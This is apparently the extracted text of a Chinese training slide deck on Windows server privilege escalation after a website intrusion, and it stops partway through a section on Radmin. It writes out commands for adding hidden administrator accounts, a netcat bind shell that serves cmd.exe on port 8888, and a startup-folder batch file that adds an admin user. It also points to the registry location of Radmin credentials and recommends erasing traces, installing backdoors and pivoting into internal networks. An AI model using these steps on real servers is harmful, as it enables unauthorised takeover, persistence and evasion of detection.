服务器提权课件.pdf

服务器提权 课程简介 本课程主要讲解文件系统权限配置不当提权、第三方软件提权、数据 库提权、服务器远程溢出提权等。 了解提权攻击原理及提权方法 掌握相关的提权工具工具进行提权 提权后的操作 文件权限 读取 该权限允许用户查看该文件夹中的文件以及子文件夹，也允许查 看该文件夹的属性、所有者和拥有的权限等； 写入 该权限允许用户在该文件夹中创建新的文件和子文件夹，也可以 改变文件夹的属性、查看文件夹的所有者和权限等。 执行 该权限允许用户在该文件夹中执行任何脚本文件或者.exe可执行 文件，此权限如果设置不当，会对计算机的安全带来严重危害。 课程目录 一、文件系统权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 基本概念 提权攻击原理及提权方法 主要针对网站入侵过程中, 当入侵某一网站时，通过各种漏洞提升 WEBSHELL权限，从而进一步获得服务器权限。 掌握相关的提权工具工具进行提权 操作系统本身的提权 利用数控进行提权 系统配置不当提权 第三方软件提权 提权后的操作 清理痕迹--隐藏攻击 安装后门--长久控制 渗透内网-扩大战果 课程目录 一、文件权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 文件权限配置不当提权 普通提权 直接执行开启3389端口、可以执行net user username password /add；net localgroup administrators username /add，如果cmd被禁用，可尝试自己上传 cmd.exe 7 文件权限配置不当提权 NC反弹提权 条件是你要有足够的运行权限 然后把它反弹到自己的电脑上，找个 可读可写的目录将nc.exe和cmd.exe上传上去。 然后到cmd命令执行 那栏里把cmd路径写上去，接着执行：C:\Inetpub\wwwroot\nc.exe - l -p 8888 -t -e C:\Inetpub\wwwroot\cmd.exe 执行完毕后打开我们的dos,执行：telnet 服务器IP 8888 说明：8888是我们监听的端口。接着tenter进入，这时就可以执行命 令添加系统账号进行终端登陆了，完毕。 注 (如果在webshell中执行的命令不是管理权限，可以将执行的命令 包含下pr中) 8 文件权限配置不当提权 NC反弹提权 直接可把shell反弹到本机上 文件权限配置不当提权 启动项提权 写启动项提权： C:/Documents and Settings/All Users/ 「开始」 菜单/程序/启动 @echo off net user admin admin /add net localgroup administrators admin /add 保存bat文件 课程目录 一、文件权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 第三方软件提权 Radmin简介 Radmin (Remote Administrator)是一款屡获殊荣的远程控制软件，它将 远程控制、外包服务组件、以及网络监控结合到一个系统里，提供目 前为止最快速、强健而安全的远程管理服务工具包。 第三方软件提权 Radmin提权 Radmin默认端口是4899，先获取密码和端口，如下位置： HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Para